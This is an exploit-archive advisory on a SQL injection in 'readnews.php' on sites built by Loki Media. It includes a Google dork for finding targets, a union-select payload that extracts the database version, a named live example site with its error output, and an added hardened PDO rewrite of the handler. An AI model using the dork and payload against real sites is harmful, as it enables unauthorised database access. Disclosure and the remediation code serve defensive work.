Designed & Powered by Loki Media ThisisLoki SQL Injection

Author: KingSkrupellos, Published: 08-10-2018

# Exploit Title : Designed & Powered by Loki Media ThisisLoki SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 06/10/2018
# Vendor Homepage : thisisloki.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Loki - The Full Service Digital Agency

# Google Dork :

intext:''Designed & Powered by Loki Media''

# SQL Injection Exploit :

/readnews.php?id=[SQL Injection]

/readnews.php?id=-1+union+Select+1,2,3,version()--

# Database version returned by the query :

5.6.39-83.1

#################################################################################################

# Example Vulnerable Site => replasticsurgery.asia/readnews.php?id=4%27 => [ Proof of Concept ] => archive.is/p0xr6

# SQL Database Error =>

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in
/nfs/c04/h01/mnt/58978/domains/replasticsurgery.asia/html/readnews.php on line 19
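
The warning above shows a failed query result being passed on unchecked and PHP errors being printed to the visitor. A hardened form of the handler follows as an added example; it is not the vendor's code or part of the original advisory. The DSN, credentials, and the `news` table with `title` and `body` columns are assumptions.

```php
<?php
// Added example: hardened readnews.php. DSN, credentials and the `news`
// table with `title`/`body` columns are assumptions, not the vendor's schema.
declare(strict_types=1);
// Keep database warnings and filesystem paths out of the HTTP response.
ini_set('display_errors', '0');

function news_id_from_request(array $query): ?int
{
    // Accept only a positive decimal integer; "4'", "-1 union ..." and arrays fail.
    $id = filter_var($query['id'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function fetch_news(PDO $pdo, int $id): ?array
{
    // The id is bound as a typed parameter, never concatenated into the SQL text.
    $stmt = $pdo->prepare('SELECT title, body FROM news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$id = news_id_from_request($_GET);
if ($id === null) {
    http_response_code(400);
    exit('Bad request');
}

try {
    $pdo = new PDO('mysql:host=localhost;dbname=site;charset=utf8mb4', 'app_user', 'CHANGE_ME', [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,   // failures throw, no silent false
        PDO::ATTR_EMULATE_PREPARES => false,           // use server-side prepares
    ]);
    $article = fetch_news($pdo, $id);
} catch (PDOException $e) {
    error_log('readnews.php: ' . $e->getMessage());    // detail goes to the log only
    http_response_code(500);
    exit('Internal error');
}

if ($article === null) {
    http_response_code(404);
    exit('Not found');
}
echo '<h1>' . htmlspecialchars($article['title'], ENT_QUOTES, 'UTF-8') . '</h1>';
echo '<div>' . nl2br(htmlspecialchars($article['body'], ENT_QUOTES, 'UTF-8')) . '</div>';
```

The `mysql_*` functions named in the warning were removed in PHP 7.0, so moving to PDO or mysqli with bound parameters is required on supported PHP versions in any case.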

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
